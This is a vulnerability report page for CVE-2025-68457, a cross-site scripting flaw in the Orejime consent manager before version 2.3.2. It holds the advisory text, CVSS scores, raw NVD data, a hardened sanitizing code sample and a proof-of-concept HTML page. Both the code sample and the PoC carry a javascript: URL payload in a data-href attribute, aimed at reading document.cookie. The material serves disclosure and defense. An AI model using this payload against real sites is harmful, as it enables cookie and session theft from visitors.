Security Vulnerability Report
CVE-2025-68457 CVSS 6.1 MEDIUM

CVE-2025-68457

Published: 2025-12-19 17:15:53
Last Modified: 2026-01-13 17:15:59

Description

Orejime is a consent manager that focuses on accessibility. On HTML elements handled by Orejime prior to version 2.3.2, one could run malicious code by embedding `javascript:` code within data attributes. When consenting to the related purpose, Orejime would turn data attributes into unprefixed ones (i.e. `data-href` into `href`), thus executing the code. This shouldn't have any impact on most setups, as elements handled by Orejime are generally hardcoded. The problem would only arise if somebody could inject HTML code within pages. The problem has been patched in version 2.3.2. As a workaround, the problem can be fixed outside of Orejime by sanitizing attributes which could contain executable code.
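The attribute-unprefixing step the description refers to, modelled as an added example that is not Orejime's code: a plain-object version of "copy every `data-*` attribute to its unprefixed name" beside the sanitizing variant the advisory suggests as a workaround. The attribute lists, the allowed schemes and the sample elements are constructed assumptions, not taken from Orejime.

```javascript
// Added example, not Orejime's code: a model of the data-* unprefixing step
// described in the advisory, beside a sanitizing version of the same step.
// Attributes are modelled as plain objects so this runs outside a browser;
// the attribute lists and allowed schemes below are assumptions, not
// Orejime's real ones.

// Attributes whose value a browser treats as a URL.
const URL_ATTRIBUTES = new Set(['href', 'src', 'action', 'formaction', 'xlink:href']);
// Schemes allowed for those attributes (assumption; adjust per site policy).
const SAFE_SCHEMES = new Set(['http:', 'https:', 'mailto:', 'tel:']);

// Extract the URL scheme the way a browser would: strip ASCII control and
// whitespace characters first (URL parsers ignore them, so "java\tscript:"
// still runs) and lowercase. Returns null for relative URLs.
function urlScheme(value) {
  const cleaned = String(value).replace(/[\u0000-\u0020\u007f]/g, '').toLowerCase();
  const m = /^([a-z][a-z0-9+.\-]*:)/.exec(cleaned);
  return m ? m[1] : null;
}

// True when copying `value` into attribute `name` could execute script.
function isDangerousAttribute(name, value) {
  const lname = name.toLowerCase();
  if (lname.startsWith('on')) return true;              // onclick=, onload=, ...
  if (!URL_ATTRIBUTES.has(lname)) return false;
  const scheme = urlScheme(value);
  if (scheme === null) return false;                    // relative URL
  return !SAFE_SCHEMES.has(scheme);                     // javascript:, data:, vbscript:, ...
}

// Vulnerable behaviour (pre-2.3.2 as described): every data-* attribute is
// copied verbatim to its unprefixed name, so data-href="javascript:..."
// becomes a live href.
function unprefixVulnerable(attrs) {
  const out = { ...attrs };
  for (const [name, value] of Object.entries(attrs)) {
    if (!name.startsWith('data-')) continue;
    out[name.slice('data-'.length)] = value;
    delete out[name];
  }
  return out;
}

// Hardened variant: same copy, but values that would execute script are
// dropped and reported instead of being promoted.
function unprefixHardened(attrs) {
  const out = { ...attrs };
  const dropped = [];
  for (const [name, value] of Object.entries(attrs)) {
    if (!name.startsWith('data-')) continue;
    const target = name.slice('data-'.length);
    delete out[name];
    if (isDangerousAttribute(target, value)) {
      dropped.push(target);
      continue;
    }
    out[target] = value;
  }
  return { attrs: out, dropped };
}

// Constructed sample input: the injected link from the PoC, plus a benign element.
const INJECTED_LINK = {
  href: 'https://example.com/',
  'data-href': 'javascript:alert(document.cookie)',
};
const BENIGN_SCRIPT = { 'data-src': 'https://cdn.example.com/tracker.js' };

console.log(unprefixVulnerable(INJECTED_LINK));  // href is now javascript:...
console.log(unprefixHardened(INJECTED_LINK));    // original href kept, 'href' reported
console.log(unprefixHardened(BENIGN_SCRIPT));    // src promoted normally
```

The scheme check strips control characters and lowercases before matching, because `java\tscript:` or `JaVaScRiPt:` reach the browser as a working `javascript:` URL; a naive `startsWith('javascript:')` test would miss both. Treating `on*` attribute names as always dangerous closes the same hole for event handlers.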

CVSS Details

CVSS Score (NVD, CVSS 3.1, primary)
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS Score (CNA, CVSS 4.0, secondary)
0.6
Severity
LOW
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U
The CNA's AT:P (attack requirements present) reflects the precondition stated in the description: an attacker must already be able to inject HTML into the page before the data-attribute conversion becomes exploitable.

Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

cpe:2.3:a:boscop:orejime:*:*:*:*:*:node.js:*:* - VULNERABLE
Orejime < 2.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC for CVE-2025-68457: Orejime data attribute XSS -->
<!-- Demonstrates how a javascript: URL placed in a data-* attribute is
     executed once Orejime copies it to the unprefixed attribute -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-68457 PoC</title>
  <!-- Load a vulnerable version of Orejime (< 2.3.2) -->
  <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/orejime.js"></script>
</head>
<body>
  <!-- Injected HTML: data-href carries a javascript: URL.
       When the user consents, Orejime turns data-href into href. -->
  <div class="orejime-App" data-config="config">
    <a href="https://legitimate-site.com"
       data-href="javascript:alert(document.cookie)"
       data-orejime="marketing">
      Click me (malicious payload in data-href)
    </a>
  </div>
  <script>
    // Orejime configuration: a single optional "marketing" purpose
    var config = {
      apps: [
        {
          name: "marketing",
          title: "Marketing Cookies",
          cookies: ["marketing_*"],
          required: false
        }
      ]
    };
    // Initialize Orejime
    window.orejimeConfig = config;
  </script>
  <!-- Attack steps:
       1. Attacker injects HTML with a data-href containing a javascript: URL
       2. User visits the page and sees the Orejime consent manager
       3. User consents to the 'marketing' purpose
       4. Orejime converts data-href to href: href="javascript:alert(document.cookie)"
       5. Clicking the link executes the injected JavaScript
       6. Attacker can steal cookies, session tokens, or perform other malicious actions
       Fix: upgrade to Orejime >= 2.3.2 -->
</body>
</html>

References

https://github.com/boscop-fr/orejime/issues/142 (Issue Tracking)
https://github.com/boscop-fr/orejime/pull/143 (Issue Tracking, Patch, Vendor Advisory)
https://github.com/boscop-fr/orejime/security/advisories/GHSA-72mh-hgpm-6384 (Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68457", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:53.393", "lastModified": "2026-01-13T17:15:59.040", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Orejime is a consent manager that focuses on accessibility. On HTML elements handled by Orejime prior to version 2.3.2, one could run malicious code by embedding `javascript:` code within data attributes. When consenting to the related purpose, Orejime would turn data attributes into unprefixed ones (i.e. `data-href` into `href`), thus executing the code. This shouldn't have any impact on most setups, as elements handled by Orejime are generally hardcoded. The problem would only arise if somebody could inject HTML code within pages. The problem has been patched in version 2.3.2. As a workaround, the problem can be fixed outside of Orejime by sanitizing attributes which could contain executable code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:boscop:orejime:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2.3.2", "matchCriteriaId": "06B66BE4-1528-4C51-8CB6-ABDC27E2BF50"}]}]}], "references": [{"url": "https://github.com/boscop-fr/orejime/issues/142", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/boscop-fr/orejime/pull/143", "source": "[email protected]", "tags": ["Issue Tracking", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/boscop-fr/orejime/security/advisories/GHSA-72mh-hgpm-6384", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}